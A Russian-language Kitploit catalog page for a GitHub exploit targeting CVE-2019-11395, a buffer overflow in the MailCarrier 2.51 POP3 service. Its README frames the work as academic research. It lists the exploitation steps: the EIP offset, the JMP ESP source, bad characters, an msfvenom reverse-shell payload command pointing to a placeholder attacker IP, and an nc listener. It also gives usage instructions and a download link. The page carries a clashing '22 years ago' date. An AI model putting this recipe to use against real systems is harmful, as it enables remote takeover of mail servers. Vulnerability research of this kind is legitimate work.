Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-11395 — Python-эксплойт для CVE-2019-11395, переполнение буфера в POP3-сервисе MailCarrier 2.51. Генерирует полезную нагрузку reverse shell через msfvenom и обеспечивает удалённое выполнение кода на Windows-системах. | Kitploit
Инструменты/GitHubGitHub/caioprince/cve-2019-11395
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHubcaioprince/cve-2019-11395

CVE-2019-11395

Python-эксплойт для CVE-2019-11395, переполнение буфера в POP3-сервисе MailCarrier 2.51. Генерирует полезную нагрузку reverse shell через msfvenom и обеспечивает удалённое выполнение кода на Windows-системах.

Репозиторий
22 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-11395 Эксплойт 🛡️

О CVE-2019-11395 🕵️

Уязвимость CVE-2019-11395 представляет собой переполнение буфера в почтовом приложении MailCarrier 2.51, позволяющее удалённое выполнение кода. Уязвимость возникает в процессах SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP или POP3 RETR.

В ходе академического исследования основное внимание было уделено процессам POP3 для создания Proof of Concept (PoC). Было установлено, что отправка 6000 байт в приложение приводит к прекращению его работы, что выявляет уязвимость переполнения буфера.

Шаги эксплуатации 🔍

  1. Использовал msf-pattern_create -l 6000 для точного определения EIP.
  2. Определил смещение EIP с помощью msf-pattern_offset -q 6E47386E -l 6000, в результате чего смещение EIP составило 5095.
  3. Определил, что expsrv.dll с отключённым ASLR подходит для JMP ESP.
  4. Выявил плохие символы \x00\x0a\x0d во время тестов на недопустимые символы.
  5. Сгенерировал полезную нагрузку с помощью msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.
  • Скорректировал код CVE-2019-11395.py для адаптации под полезную нагрузку.
  • Открыл соединение с помощью nc -lnvp 4444 и выполнил эксплойт (CVE-2019-11395.py), чтобы получить доступ к среде и подтвердить описанную CVE.
  • Использование 🚀

    Выполните следующие шаги для использования эксплойта:

    1. Сгенерируйте полезную нагрузку с помощью msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.
    2. Скопируйте вывод команды msfvenom.
    3. Скорректируйте код CVE-2019-11395.py, заменив переменную shellcode на вывод, полученный из команды msfvenom.
    4. Выполните эксплойт (CVE-2019-11395.py), чтобы получить доступ к среде и подтвердить описанную CVE.

    Скомпрометированная среда 📸

    PoC CVE-2019-11395

    🔗 Свяжитесь со мной

    Посетите мой профиль в LinkedIn

    Скачать инструмент